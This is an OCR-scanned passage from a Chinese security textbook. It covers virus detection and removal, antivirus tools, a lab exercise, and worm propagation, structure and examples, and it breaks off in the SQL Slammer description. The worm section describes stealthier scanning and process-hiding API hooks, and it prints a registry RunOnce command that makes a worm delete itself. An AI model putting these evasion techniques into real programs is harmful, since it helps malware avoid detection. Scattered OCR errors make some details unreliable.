速 处 置 ,及 时 消除 病毒 ,防止 计算 机 病毒 对 我 国 的 计算 机 网 络 和 信息 系统 造成 重大 的 破坏 ， 
确保 我 国信 息 产 业 安 全 健康 发 展 。 

另 一 方面 ,为 了 使 中 国 的 计算 机 病毒 防治 工作 走 上 法 制 轨道 ,国家 于 1994 年 2 月 颁布 
了 《中 华人 民 共 和 国 计 算 机 信息 系统 安全 保护 条 例 》, 在 此 基础 上 又 颁布 了 《计算 机 病毒 防治 
管理 办 法 》, 还 在 新 修改 的 (中 华人 民 共 和 国 刑法 ) 中 对 故意 制造 ,传播 计算 机 病毒 的 行为 规 
定 了 相应 的 处 罚 办 法 。 


2. 计算 机 病毒 检测 


计算 机 病毒 是 一 段 程序 代码 ,即使 它 隐藏 得 很 好 ,也 会 留 下 许多 痕迹 。 通 过 对 这 些 蛛 丝 
马 迹 的 判别 , 找 出 病毒 的 特征 和 名 称 , 这 就 称 为 查 毒 。 目 前 使 用 的 查 毒 方法 有 : 

(1) 现象 观测 法 

根据 计算 机 病毒 发 作 前 ,发作 时 和 发 作 后 的 表面 现象 ,推断 发 现 计算 机 病毒 。 

(2) 进程 监视 法 

进程 监视 会 观察 到 系统 的 活动 状况 ,同时 也 会 拦截 所 有 可 疑 行 为 。 例 如 ,多 数 个 人 计算 
机 的 BIOS 都 有 防 病 毒 设置 , 当 这 些 设置 打开 时 ,就 允许 计算 机 拦截 所 有 对 系统 主 引导 记录 
进行 写 人 的 企图 。 

(3) 比较 法 

比较 法 用 原始 的 或 正常 的 文件 与 被 检测 的 文件 进行 比较 。 比 较 内 容 有 : 

。 长 度 (内 容 ) 比 较 ; 

。 内 存 比较 ; 

。 中断 比较 ; 

。 校 验 和 比较 。 

比较 法 可 以 通过 感染 实验 室 法 进行 。 它 先 运 行 一 些 确切 知道 不 带 病毒 的 正常 程序 , 然 
后 观察 这 些 正常 程序 的 长 度 和 校 验 和 ,如 果 发 现 有 的 程序 增长 ,或 者 校 验 和 变化 ,就 可 以 断 
言 系统 中 有 病毒 。 

(4) 特征 代码 法 

特征 代码 法 是 将 所 有 病毒 的 病毒 码 加 以 剖析 ,把 分 析 得 到 的 这 些 病 毒 独 有 的 特征 搜集 
在 一 个 病毒 码 资料 库 ( 病 毒 库 ) 中 。 检 测 时 ,以 扫描 的 方式 将 待 检测 程序 与 病毒 库 中 的 病毒 
特征 码 进行 一 一 对 比 ,发 现 有 相同 的 代码 , 则 可 判定 该 程序 已 遭 病毒 感染 。 这 种 方法 是 许多 
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病毒 检测 工具 的 基础 。 但 是 ,这 种 方法 检测 不 出 未 知 病毒 ,对 被 测 对 象 本 身 带 有 “特征 库 ” 数 
据 的 反 病毒 软件 不 采用 该 检测 方法 。 

(5) 软件 模拟 法 

软件 模拟 法 是 一 种 软件 分 析 器 , 它 用 软件 方法 模拟 和 分 析 程 序 的 运行 。 这 种 方法 以 后 
演绎 为 虚拟 机 上 进行 的 查 毒 、 欺 负 式 查 毒 等 技术 ,是 相对 成 熟 的 技术 。 

(6) 分 析 法 

分 析 法 适用 于 反 病 毒 技术 人 员 的 病毒 检测 方法 ,分 为 静态 分 析 和 动态 分 析 两 种 方法 。 
静态 分 析 法 是 用 Debug 等 反 汇 编程 序 , 将 病毒 代码 打印 成 反 汇编 后 的 程序 清单 进行 分 析 ， 
看 病毒 分 成 哪些 模块 ,使 用 了 哪些 系统 调用 ,采用 了 哪些 技巧 ,如 何 将 病毒 感染 文件 的 过 程 
翻转 为 清除 病毒 、 修 复 文件 的 过 程 ,哪些 代码 可 被 用 作 特 征 代 码 以 及 如 何 防 御 这 种 病毒 。 

动态 分 析 法 是 利用 Debug 等 调试 工具 ,在 内 存 带 病毒 的 情况 下 ,对 病毒 作 动态 跟踪 , 观 
察 病毒 的 具体 工作 过 程 ,以 进一步 在 静态 分 析 的 基础 上 理解 病毒 工作 的 原理 。 

在 病毒 编码 比较 简单 的 情况 下 ,动态 分 析 不 是 必需 的 。 当 病毒 采用 了 较 多 的 技术 手段 
时 ,必须 使 用 动静 相 结合 的 分 析 方 法 才能 完成 整个 分 析 过 程 。 


3. 计算 机 病毒 的 清除 


病毒 的 清除 ,也 称 为 对 象 恢复 ,就 是 将 染 毒 文件 中 的 病毒 代码 摘除 。 计 算 机 病毒 很 多 ， 
并 且 还 在 不 断 出 现 。 它 们 的 特性 各 异 ,生成 技术 不 同 ,清除 方法 也 不 同 。 下 面 介绍 几 种 已 有 
病毒 的 清除 方法 。 

(1) 引导 型 病毒 的 清除 

清除 引导 型 病毒 的 最 有 效 ,最 简单 的 方法 是 进行 磁盘 的 格式 化 。 但 是 ,格式 化 的 同时 也 
使 有 用 数据 同归于尽 。 因 此 ,要 尽量 采用 不 格式 化 方法 清除 引导 型 病毒 。 

J@ 主 引导 扇 区 的 修复 

。 用 无 病毒 软盘 启动 系统 。 

。 寻找 一 台 同 类 型 .硬盘 分 区 相同 的 无 病毒 计算 机 ,将 其 硬盘 主 引 导 扇 区 写 人 一 张 软 盘 。 

。 将 该 盘 插入 染病 毒 计算 机 ,将 其 中 采集 的 主 引导 扇 区 数据 写 人 染病 毒 硬盘 。 

。 修复 结束 。 

@ Boot 扇 区 的 恢复 

。 用 无 病毒 软盘 启动 系统 。 

。 运行 有 关 命令 进行 恢复 ,如 FDISK/MBR( 重 写 一 个 无 病毒 的 MBR) FDISK( 读 取 

或 重 写 分 区 表 ) 以 及 FORMAT C: /S 或 SYS C: ( 重 写 一 个 无 病毒 的 活动 分 区 引导 
记录 ) 等 。 

(2) 文件 型 病毒 的 清除 

文件 型 病毒 的 清除 ,可 分 两 种 情形 讨论 。 一 是 破坏 性 感染 病毒 ,这 类 病毒 一 般 采 用 覆盖 
式 写 入 ,由 于 破坏 了 宿主 文件 ,所 以 当 没有 原文 件 的 副本 时 ,是 不 可 恢复 的 。 另 一 种 情形 是 
非 破 坏 性 病毒 ,它们 感染 的 文件 是 可 以 恢复 的 ,但 是 恢复 方法 是 很 复杂 的 ,没有 专门 知识 (如 
对 可 执行 文件 格式 的 了 解 , 以 及 是 否 掌握 汇编 语言 知识 ) 是 做 不 到 手工 恢复 的 。 

(3) 宏 病 毒 的 清除 
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@ 手工 清除 

例如 清除 Word 文档 中 的 宏 病 毒 ,可 以 采用 如 下 方法 : 

。 选取 “工具 | 宏 ”, 进 入 “管理 器 ”; 

。 选取 “ 宏 方 案 项 (M)”; 

。 在 “ 宏 方 案 项 的 有 效 范围 "下拉 列 表 框 中 ,选择 要 检查 的 文档 ,在 其 上 方 列表 框 中 会 
显示 该 文档 模板 中 出 现 的 宏 ; 

。 将 来 源 不 明 的 宏 删 除 。 

@ 使 用 杀毒 软件 

下 面 介绍 在 Windows 环境 下 使 用 KV3000 清除 宏 病 毒 的 方法 。 

。 执行 KV3000; 

。 任 选 一 可 能 存在 宏 病 毒 的 子 目录 进行 检查 ; 

。 为 安全 起 见 , 查 出 病毒 后 , 先 将 其 扩展 名 改名 (如 改 为 . kv); 

。 将 原文 件 中 的 病毒 杀 除 。 


4. 病毒 防治 软件 


(1) 病毒 防治 软件 的 类 型 

病毒 防治 软件 的 功能 不 外 平 查 毒 .杀毒 。 按 照 查 毒 . 杀 毒 机 制 , 病 毒 防 治 软 件 可 以 分 为 3 类: 

Qa 病毒 扫描 型 软件 : 病毒 扫描 型 软件 采用 特征 扫描 法 ,根据 已 知 病毒 特征 扫描 可 能 的 
感染 对 象 。 

G@) 完整 性 检查 型 软件 : 完整 性 检查 型 软件 采用 比较 法 和 校 验 和 法 ,监视 对 象 (包括 引 
导 扇 区 和 文件 等 ) 的 属性 (大 小 .时 间 、. 日 期 和 校 验 和 ) 和 内 容 , 如 果 发 生变 化 , 则 对 象 极 有 可 

@ 行为 封锁 型 软件 : 行为 封锁 型 软件 采用 驻 留 内 存在 后 台 工 作 的 方式 ,监视 可 能 因 病 毒 引 
起 的 异常 行为 。 发 现 异 常 行为 ,就 及 时 发 出 警告 ,让 用 户 决定 是 否 让 所 发 生 的 行为 继续 进行 。 

(2) 病毒 防治 软件 的 选择 指标 

@ 识别 率 : 识别 率 主要 从 下 面 两 个 方面 来 衡量 : 

。 误 报 (false positive) 率 : 在 被 检测 对 象 中 ,对 没有 感染 病毒 的 对 象 发 出 警报 的 比率 。 

。 漏 报 (false negative) 率 : 在 被 检测 对 象 中 ,对 感染 病毒 的 对 象 没 有 被 检测 出 的 比率 。 

@ 检测 速度 : 不 同 的 抗 病毒 软件 使 用 不 同 的 病毒 扫描 算法 ,会 影响 检测 速度 。 当 然 ， 
开发 者 的 能 力也 影响 检测 速度 。 

@ 动态 检测 (on-the-fly scanning) 能 力 : 动态 检测 也 称 实时 检测 , 指 在 操作 (打开 、 关 
闭 .创建 . 读 / 写 ) 时 检测 病毒 的 能 力 。 具 有 动态 检测 能 力 的 抗 病毒 软件 总 是 处 于 激活 状态 ， 
一 般 驻 留 在 内 存 ,主动 检测 各 种 对 象 。 

@ 按 需 检测 (on-demand scanning) 能 力 : 抗 病毒 软件 一 般 处 于 非 激 活 状 态 ,在 用 户 请 
求 下 才 开 始 扫描 。 

@ 多 平台 可 用 性 : 抗 病毒 软件 可 以 识别 OS, 根 据 不 同 的 OS 利用 不 同 的 特征 。 

@ 可 靠 性 : 可 靠 性 是 指 抗 病毒 软件 能 够 完成 正常 的 扫描 , 它 是 一 个 十 分 重要 的 准则 。 

(3) 病毒 防治 软件 产品 
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@ 国外 防 病毒 产品 及 网 站 

。 VirusScan ,网 址 : http: //www. mcafeeb2b. com 

。 NAV, 网 址 : http: //www. symantee. com 

。 Pandaguard, 网 址 : http: //www. pandaguard. com 

@ 国内 防 病毒 产品 及 网 站 

。 KILL( 冠 群 金 展 ) ,网 址 : http: //www. kill. com 

。 KV( 江 民 杀 毒 软件 ) ,网 址 : http: //www. jiangmin. com 
。 RAV( 瑞 星 杀 毒 软件 ) ,网 址 : http: //www. rising. com 
。 VRV( 北 信 源 ) ,网 址 : http: //www. vrv. com 


5. 计算 机 病毒 侵害 系统 的 恢复 


查 毒 .杀毒 的 目的 是 为 了 让 系统 能 正常 工作 。 因 此 , 查 毒 , 杀 毒 之 后 ,还 要 对 被 破坏 了 的 
系统 进行 修复 。 修复 是 对 被 病毒 破坏 了 的 文件 以 及 系统 进行 恢复 。 下 面 介绍 计算 机 病毒 感 
染 后 的 一 般 修复 处 理 方法 。 

(1) 首先 必须 对 系统 的 破坏 程度 进行 详细 而 全 面 的 了 解 , 并 根据 破坏 的 程度 决定 采用 
对 应 的 有 效 清除 方法 和 对 策 。 

。 若 受 破坏 的 大 多 是 系统 文件 和 应 用 程序 文件 ,并 且 感 染 程度 较 深 , 则 可 以 采取 重 装 

系统 的 办 法 达到 清除 计算 机 病毒 的 目的 。 

。 若 感 染 的 是 关键 数据 文件 或 感染 比较 严重 (如 硬件 被 CIH 计算 机 病毒 破坏 ), 就 应 

当 考 虑 请 计算 机 病毒 专家 进行 清除 和 数据 恢复 工作 。 

(2) 修复 前 尽 可 能 再 次 备份 重要 数据 文件 。 目 前 防 杀 病毒 软件 在 杀毒 前 大 多 都 会 保存 
重要 数据 和 被 感染 文件 ,以 便 误杀 或 因 杀 毒 造 成 新 的 破坏 后 能 够 恢复 现场 。 其 中 ,对 特别 重 
要 的 用 户 数据 文件 等 在 杀毒 前 还 应 当 单独 进行 手工 备份 ,但 是 不 能 备份 在 被 感染 破坏 的 系 
统 内 ,也 不 应 该 与 平时 的 常规 备份 混在 一 起 。 

(3) 启动 防 杀 计算 机 病毒 软件 并 对 整个 硬盘 进行 扫描 。 注 意 , 某 些 计算 机 病毒 (如 CIH 
计算 机 病毒 ) 在 Windows 95/98 状态 下 无 法 完全 清除 ,此 时 应 用 事先 准备 好 的 未 感染 计算 
机 病毒 的 DOS 系统 软盘 启动 系统 ,然后 在 DOS 下 运行 相关 杀毒 软件 进行 清除 。 

(4) 发 现 计 算 机 病毒 后 ,一 般 应 利用 防 杀 计算 机 病毒 软件 清除 文件 中 的 计算 机 病毒 。 
如 果 可 执行 文件 中 的 计算 机 病毒 不 能 被 清除 ,应 将 其 删除 后 重新 安装 相应 的 应 用 程序 。 

(5) 杀毒 完成 后 ,重启 计算 机 ,再 次 用 防 杀 计算 机 病毒 软件 检查 系统 中 是 否 还 存在 计算 
机 病毒 ,并 确定 被 感染 破坏 的 数据 确实 被 完全 恢复 。 

(6) 对 于 杀毒 软件 无 法 杀 除 的 计算 机 病毒 ,应 将 计算 机 病毒 样本 送 交 防 杀 计算 机 病毒 
软件 厂商 的 研究 中 心 , 以 供 详细 分 析 。 


实验 11 病毒 发 现 的 现象 观察 和 工具 检测 


1. 实验 目的 


(1) 了 解 计算 机 系统 感染 病毒 后 的 可 能 症状 。 
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(2) 学 会 使 用 抗 病毒 软件 发 现 并 清除 病毒 的 方法 。 
2. 实验 内 容 


(1) 设置 一 个 供 实验 用 的 并 与 外 界 隔 断 的 计算 机 系统 。 

(2) 运行 不 同 的 盘 。 记 录 运 行 前 后 计算 机 系统 出 现 的 症状 : 运行 时 间 、 进 程 表 记录 和 
内 存 状 况 等 。 

(3) 安装 一 种 抗 病 毒 软件 。 

(4) 记录 抗 病毒 软件 在 查 杀 过 程 中 提示 的 信息 和 查 杀 过 程 中 出 现 的 现象 。 

(5) 分 析 查 杀 过 程 中 出 现 的 问题 。 

(6) 评价 该 软件 工具 的 优 缺 点 。 


3. 实验 准备 


(1) 上 网 检索 有 关 抗 病毒 软件 的 信息 。 

(2) 记录 各 种 抗 病毒 软件 的 特点 。 

(3) 记录 哪些 工具 提供 试用 版 。 

(4) 购买 认为 合适 的 抗 病毒 软件 。 

(5) 列 出 抗 病毒 软件 的 下 载 /安装 步 又 。 

(6) 写 出 使 用 抗 病 毒 软件 的 注意 事项 以 及 可 能 出 现 的 事件 及 应 急 预 案 。 

(7) 制作 几 块 软盘 (或 UU 盘 ): 

。 干 净 系 统 盘 一 块 : 存放 有 干净 的 系统 程序 ,并 有 一 些 干净 的 应 用 程序 和 文件 ; 
。 染 毒 实验 盘 若 干 : 每 个 盘 中 的 系统 和 文件 相同 ,但 分 别 被 某 一 种 病毒 感染 。 
(8) 分 别 设计 使 用 症状 观察 法 和 使 用 抗 病毒 软件 发 现 并 清除 病毒 的 步骤 。 


4. 推荐 的 分 析 讨论 内 容 


(1) 你 遇 到 过 哪些 病毒 ? 它们 发 作 时 有 些 什么 症状 ? 
(2) 你 使 用 过 哪 几 种 抗 病 毒 软件 ?它们 各 有 什么 特点 ? 
(3) 其 他 发 现 或 想到 的 问题 。 


4.2 里 虫 
4.2.1 蠕虫 的 特征 及 其 传播 过 程 


1. 蠕虫 的 特征 


1982 年 ,Xerox PARC 的 John F. Shoch 等 人 为 了 进行 分 布 式 计算 的 模型 实验 ,编写 了 

称 为 蠕虫 (worm) 的 程序 。 可 他 们 哪 能 想到 ,这 种 “可 以 自我 复制 ?并 可 以 “从 一 台 计 算 机 移 

动 到 另 一 台 计算 机 ?的 程序 ,后 来 竟 给 计算 机 界 带 来 巨大 灾难 。1988 年 被 Robert Morris 释 

放 的 Morris 蠕虫 在 Internet 上 爆发 ,在 几 个 小 时 之 内 迅速 感染 了 所 能 找到 的 、 存 在 漏洞 的 
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计算 机 。 
如 图 4. 8 所 示 ,Internet 上 的 蠕虫 袭击 最 初 缓慢 地 增加 ,而 到 2000 年 后 开始 旦 指数 
下 到 s 
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60 000 上 


滋 沪 


40 000 上 上 


20 000 上 
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图 4.8 CERT( 计 算 机 紧急 响应 小 组 ) 统 计 的 1988 年 以 来 蠕虫 事件 的 发 生 次 数 


人 们 通常 也 将 蠕虫 称 为 蠕虫 病毒 ,但 是 严格 地 讲 ,它们 并 不 是 病毒 。 下 面 讨论 蠕虫 与 病 
毒 之 间 的 异同 。 

(1) 病毒 具有 寄生 性 ,寄生 在 宿主 文件 中 ,而 蠕虫 是 独立 存在 的 程序 个 体 。 

(2) 计算 机 病毒 的 攻击 对 象 是 文件 系统 。 与 计算 机 病毒 不 同 ,蠕虫 的 攻击 对 象 是 计算 
机 系统 。 

(3) 病毒 与 蠕虫 都 具有 传染 性 ,它们 都 可 以 自我 复制 。 但 是 ,病毒 与 蠕虫 的 传染 机 制 有 
3 点 不 同 : 

。 病毒 传染 是 一 个 将 病毒 代码 嵌入 到 宿主 程序 的 过 程 ,而 是 虫 的 传染 是 自身 的 复制 ; 

。 病毒 的 传染 目标 针对 本 地 程序 (文件 ) ,而 蠕虫 是 针对 网 络 上 的 其 他 计算 机 ; 

。 病 毒 是 在 宿主 程序 运行 时 被 触发 进行 传染 ,而 蠕虫 是 通过 系统 漏洞 进行 传染 。 

此 外 ,由 于 蠕虫 是 一 种 独立 程序 ,所 以 它们 也 可 以 作为 病毒 的 寄生 体 携带 病毒 ,并 在 发 
作 时 释放 病毒 ,进行 双重 感染 。 

病毒 防治 的 关键 是 将 病毒 代码 从 宿主 文件 中 摘除 。 蠕 虫 防治 的 关键 是 为 系统 打 补 丁 
(patch) ,而 不 是 简单 地 摘除 ,只 要 漏洞 没有 完全 修补 ,就 会 重复 感染 。 

(4) 计算 机 使 用 者 是 病毒 传染 的 触发 者 ,而 蠕虫 的 传染 与 操作 者 是 否 进行 操作 无 关 , 它 
搜索 到 计算 机 的 漏洞 后 即 可 主动 攻击 进行 传染 。 也 就 是 说 ,蠕虫 与 病毒 的 最 大 不 同 在 于 它 
不 需要 人 为 干预 ,能 够 自主 不 断 地 复制 和 传播 。 所 以 通常 认为 “Internet 蠕虫 是 无 需 计 算 机 
使 用 者 干预 即 可 运行 的 独立 程序 , 它 通过 不 停 地 获得 网 络 中 存在 漏洞 的 计算 机 上 的 部 分 或 
全 部 控制 权 进行 传播 ”。 

(5) 病毒 虽然 对 系统 性 能 有 影响 ,但 破坏 的 主要 是 文件 系统 。 而 蠕虫 主要 是 利用 系统 
及 网 络 漏 洞 影 响 系 统 和 网 络 性 能 ,降低 系统 性 能 。 例 如 它们 的 快速 复制 以 及 在 传播 过 程 中 
的 大 面积 漏洞 搜索 ,会 造成 巨 量 的 数据 流量 ,导致 网 络 拥塞 甚至 瘫痪 。 对 一 般 系 统 来 说 ,多 
个 副本 形成 大 量 进程 , 则 会 大 量 耗 费 系统 资源 ,导致 系统 性 能 下 降 , 对 网 络 服务 器 尤为 明显 。 
表 4.1 为 几 种 主要 蠕虫 所 造成 的 损失 。 
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表 4.1 几 种 主要 蠕虫 所 造成 的 损失 


蠕虫 名 称 持续 时 间 造成 损失 

莫 里 斯 蠕虫 1988 年 6000 多 台 计 算 机 停机 ,经 济 损失 达 9600 万 美元 

美丽 杀手 1999 征 政府 部 门 和 一 些 大 公司 紧急 关闭 网 络 服务 器 ,经 济 损失 超过 
12 亿美 元 

爱 虫 病毒 2000 年 5 月 至 今 众多 用 户 的 计算 机 被 感染 ,损失 超过 100 亿美 元 以 上 

红色 代码 2001 年 7 月 网 络 瘫 痰 ,直接 经 济 损失 超过 26 亿美 元 

求职 信 2001 年 12 月 至 今 | 大量 病毒 邮件 堵塞 服务 器 ,损失 达 数 百 亿 美元 

蠕虫 王 2003 年 家 网 络 大 面积 瘫痪 ,银行 自动 提 款 机 运作 中 断 , 直 接 经 济 损失 超 
过 26 亿美 元 

冲击 波 2003 年 7 月 大 量 网 络 瘫痪 ,造成 数 十 亿美 元 的 损失 

MyDoom 2004 年 1 月 起 el a SCO 和 微软 网 站 ,全 球 经 济 损失 达 300 多 


(6) 由 于 蠕虫 传播 过 程 的 主动 性 ,不 需要 像 病毒 那样 需要 计算 机 使 用 者 的 操作 触发 , 因 
而 基本 不 可 察觉 。 

从 上 述 讨论 可 以 看 出 ,蠕虫 虽然 与 病毒 有 些 不 同 , 但 也 有 许多 共同 之 处 。 如 果 说 凡是 能 
够 引起 计算 机 故障 、 破 坏 计算 机 数据 的 程序 统称 为 计算 机 病毒 ,那么 ,从 这 个 意义 上 讲 , 蠕 虫 
也 应 当 是 一 种 病毒 。 它 以 计算 机 为 载体 ,以 网 络 为 攻击 对 象 , 是 通过 网 络 传播 的 恶性 病毒 。 


2. 蠕虫 传播 的 基本 过 程 


图 4.9 表明 了 蠕虫 的 基本 工作 过 程 : 蠕虫 首先 随机 生成 一 个 IP 地 址 作为 要 攻击 的 对 
象 ,接着 对 被 攻击 的 对 象 进行 扫描 ,探测 有 无 存在 漏洞 的 主机 。 当 程序 向 某 个 主机 发 送 探测 
漏洞 的 信息 并 收 到 成 功 的 反馈 信息 后 ,就 得 到 一 个 可 传播 的 对 象 ,就 可 以 将 蠕虫 主体 迁移 到 
目标 主机 。 然 后 ,蠕虫 程序 进入 被 感染 的 系统 ,对 目标 主机 进行 现场 处 理 。 现 场 处 理 部 分 的 
工作 包括 隐藏 信息 搜集 等 。 蠕 虫 和 侵 到 计算 机 系统 之 后 ,会 在 被 感染 的 计算 机 上 产生 自己 
的 多 个 副本 ,每 个 副本 启动 搜索 程序 寻找 新 的 攻击 目标 。 一 般 要 重复 上 述 过 程 m 次 (m 为 
蠕虫 产生 的 繁殖 副本 数量 )。 不 同 的 蠕虫 采取 的 IP 生成 策略 可 能 并 不 相同 ,甚至 随机 生成 。 
各 个 步 又 的 繁 简 程度 也 不 同 , 有 的 十 分 复杂 ,有 的 则 非常 简单 。 


1 
随机 生成 耳 地 址 


了 
探测 地 址 


攻击 、 传 染 、 现 场 处 理 
再 查找 


图 4.9 蠕虫 的 工作 流程 


4.2.2 蠕虫 的 重要 机 制 和 功能 结构 


1. 蠕虫 的 扫描 机 制 


一 般 来 说 ,蠕虫 希望 隐蔽 地 传播 ,并 尽快 地 传播 更 多 的 主机 。 根 据 这 一 原则 ,扫描 模块 
采取 的 扫描 策略 是 : 随机 选取 一 段 IP 地 址 ,然后 对 这 一 地 址 段 上 的 主机 进行 扫描 。 

差 的 扫描 程序 并 不 知道 一 段 地 址 是 否 已 经 被 扫描 过 ,只 是 随机 地 扫描 Internet, 很 有 可 
能 重复 扫描 一 个 地 址 段 。 于 是 , 随 着 蠕虫 传播 的 越 广 , 网 上 的 扫描 包 越 多 ,即使 探测 包 很 小 ， 
但 积 少 成 多 ,就 会 引起 严重 的 网 络 拥塞 ,应 引起 注意 。 

扫描 策略 改进 的 原则 是 ,尽量 减少 重复 的 扫描 ,使 扫描 发 送 的 数据 包 尽 量 少 ,并 保证 扫 
描 获 盖 尽 量 大 的 范围 。 按 照 这 一 原则 ,可 以 有 如 下 一 些 策略 。 

(1) 在 网 段 的 选择 上 ,可 以 主要 对 当前 主机 所 在 网 段 进 行 扫描 ,对 外 网 段 随 机 选择 几 个 
小 的 IP 地 址 段 进行 扫描 。 

(2) 对 扫描 次 数 进行 限制 。 

(3) 将 扫描 分 布 在 不 同 的 时 间 段 进行 ,不 集中 在 某 一 时 间 内 。 

(4) 针对 不 同 的 漏洞 设计 不 同 的 探测 包 , 以 提高 扫描 效率 。 例 如 : 

。 对 远程 缓冲 区 溢出 漏洞 ,通过 发 出 溢出 代码 进行 探测 ; 

。 对 Web CGI 漏洞 ,发 出 一 个 特殊 的 HTTP 请 求 探测 。 


2. 蠕虫 的 隐藏 手法 


蠕虫 为 了 不 被 发 现 ,就 要 采用 一 些 隐 藏 技术 。 下 面 介绍 蠕虫 的 几 种 隐藏 手法 。 

(1) 修改 蠕虫 在 系统 中 的 进程 号 和 进程 名 称 ,掩盖 蠕虫 启动 的 时 间 记 录 。 此 方法 在 
Windows 95/98 下 可 以 使 用 RegisterServiceProcess API 函数 使 得 进程 不 可 见 。 但 是 ,在 
Windows NT/2000 下 ,由 于 没有 这 个 函数 ,只 能 在 psapi. dll 的 EnumProcess API 上 设置 
“钩子 ”, 建 立 一 个 虚 的 进程 查看 函数 。 

(2) 将 蠕虫 复制 到 一 个 目录 下 ,并 更 换文 件 名 为 已 经 运行 的 服务 名 称 ,使 任务 管理 器 不 
能 终止 蠕虫 运行 。 这 时 要 参考 ADV API32. DLL 中 的 OpnSCManagerA 和 CreateServi- 
ceA. API 函数 。 

(3) 删除 自己 : 在 Windows 95 系统 中 ,可 以 采用 DeleteFile API 函数 。 在 Windows 
98/NT/2000 中 ,只 能 在 系统 下 次 启动 时 删除 自己 。 比 较 好 的 方法 是 在 注册 表 中 写 一 条 : 

HKLM\SoftWare\ MICROSOFT\WINDOWS\CurrentVetsionN\RUNONCE%COMSPEC%/C DEL = 

PATH_TO_ WORM\WORM_FILE_NAME. EXE 


然后 重新 启动 操作 系统 。 
3. 蠕虫 程序 的 功能 结构 


一 个 蠕虫 程序 的 基本 功能 包括 传播 模块 、 隐 藏 模块 和 目的 模块 三 部 分 。 

(1) 传播 模块 

传播 模块 是 实现 蠕虫 的 自动 人 侵 功 能 。 没 有 蠕虫 的 传播 技术 ,也 就 谈 不 上 什么 蠕虫 技 
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术 。 传 播 模块 由 扫描 子 模块 攻击 子 模块 和 复制 子 模 块 组 成 。 

。 扫描 模块 负责 探测 存在 漏洞 的 主机 。 当 程序 向 某 个 主机 发 送 探测 漏洞 的 信息 并 收 
到 成 功 的 反馈 信息 后 ,就 会 得 到 一 个 可 传播 的 对 象 。 

。 攻击 模块 按照 漏洞 攻击 步骤 自动 攻击 已 经 找到 的 攻击 对 象 ,获得 一 个 shell。 获 得 一 
个 shell ,就 拥有 了 对 整个 系统 的 控制 权 。 对 Win 2z 来 说 ,就 是 cmd. exe。 

。 复制 模块 通过 原 主 机 和 新 主机 的 交互 ,将 蠕虫 程序 复制 到 新 主机 并 启动 ,实际 上 是 
一 个 文件 传输 过 程 。 

(2) 隐藏 模块 : 侵入 主机 后 ,隐藏 蠕虫 程序 ,防止 被 用 户 发 现 。 

(3) 目的 模块 : 实现 对 计算 机 的 控制 ,监视 或 破坏 等 功能 。 


4.2.3 蠕虫 举例 


1. L WORM. Blebla. B 网 络 蠕虫 


该 蠕虫 通过 电子 邮件 的 附件 发 送 , 文 件 的 名 称 是 xromeo. exe 和 xjuliet. chm。 

当 用 户 在 使 用 OE 阅读 信件 时 ,这 两 个 附件 自动 被 保存 、 运 行 。 当 运行 了 该 附件 后 ,该 
蠕虫 程序 将 自身 发 送 给 Outlook 地 址 短 里 的 每 一 个 人 ,并 将 信息 发 送 给 alt. comp. virus 新 
闻 组 。 该 蠕虫 程序 是 以 一 个 E-mail 附件 的 形式 发 送 的 ,信件 的 主体 是 以 HTML 语言 写成 
的 ,并 且 含 有 两 个 附件 : xromeo. exe 及 xjuliet. chm, 收 件 人 本 身 看 不 见 邮件 的 内 容 。 

该 蠕虫 程序 的 危害 性 还 表现 在 它 还 能 修改 注册 表 的 一 些 项 目 ,使 得 一 些 文件 的 执行 必 
须 依 赖 该 蠕虫 程序 生成 的 在 Windows 目录 下 的 SYSRNJ. EXE 文件 。 由 此 可 见 , 对 于 该 病 
毒 程序 的 清除 不 能 简单 地 将 蠕虫 程序 删除 掉 ,而 必须 先 将 注册 表 中 的 有 关 该 蠕虫 的 设置 删 
除 后 ,才能 删除 这 些 蠕虫 程序 。 


2. L WORM/EMANUEL 网 络 蠕虫 


该 蠕虫 通过 Microsoft 的 Outlook Express 自动 传播 给 受 感染 计算 机 的 地 址 德里 的 所 
有 人 ,给 每 人 发 送 一 封 带 有 该 附件 的 邮件 。 该 网 络 蠕虫 长 度 为 16 896 一 22 000 字 节 ,有 多 个 
变种 。 

在 用 户 执 行 该 附件 后 ,该 网 络 蠕虫 程序 在 系统 状态 区 域 的 时 钟 旁边 放置 一 个 “ 花 ” 一 样 
的 图 标 , 如 果 用 户 单 击 该 * 花 ”图 标 ,就 会 出 现 一 个 消息 框 ,大 意 是 不 要 按 此 按钮 。 如 果 按 了 
该 按钮 的 话 ,会 出 现 一 个 以 Emmanuel 为 标题 的 信息 框 , 当 用 户 关闭 该 信息 框 时 又 会 出 现 一 
些 别 的 : 诸如 上 帝 保佑 你 的 提示 信息 。 

该 蠕虫 是 世界 上 第 一 个 可 自我 分 解 成 多 个 大 小 可 变化 的 程序 块 (插件 ), 分 别 潜藏 在 计算 机 
内 的 不 同位 置 ,以 便 躲 避 查 毒 软件 ,在 传播 和 破坏 时 ,再 将 这 些 碎 块 聚合 成 一 个 完整 程序 。 


3. I WORM. Magistr 网 络 蠕虫 


这 是 一 个 恶性 恶意 代码 ,可 通过 网 络 上 的 电子 邮件 或 在 局 域 网 内 进行 传播 ,发 作 时 间 是 

在 感染 系统 一 个 月 后 。 发 作 时 , 它 会 随机 在 当前 机 上 找 一 个 . EXE 或 . SCR 文件 和 一 些 

.DOC 或 . TXT 文件 作为 附件 发 出 去 ,并 会 改写 本 地 机 和 局 域 网 中 计算 机 上 的 文件 ,导致 文 

件 不 能 恢复 。 在 Windows 9x 环境 下 ,该 蠕虫 会 像 CIH 病毒 一 样 ,破坏 BIOS 和 清除 硬盘 上 
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的 数据 ,是 危害 性 非常 大 的 一 种 恶意 代码 。 
4. SQL 蠕虫 王 


SQL 蠕虫 王 是 2003 年 1 月 25 日 在 全 球 爆发 的 蠕虫 。 它 非常 小 ,仅仅 只 有 376 字 节 ,是 
针对 Microsoft SQL Server 2000 的 蠕虫 ,利用 的 安全 漏洞 是 “Microsoft SQL Server 2000 
Resolution 服务 远程 缓冲 区 溢出 ”漏洞 ,利用 的 端口 是 SQL Server Resolution 服务 的 
UDP 1434。 

当 SQL Server Resolution 服务 在 UDP 1434 端口 接收 到 第 一 个 字 节 设置 为 0x04 的 
UDP 包 时 ,SQL 监视 线程 会 获取 UDP 包 中 的 数据 ,并 用 用 户 提 供 的 该 信息 尝试 打开 注册 
表 中 的 某 一 键 值 。 利 用 这 一 点 ,攻击 者 会 在 该 UDP 包 后 追加 大 量 字 符 串 数据 。 当 尝试 打 
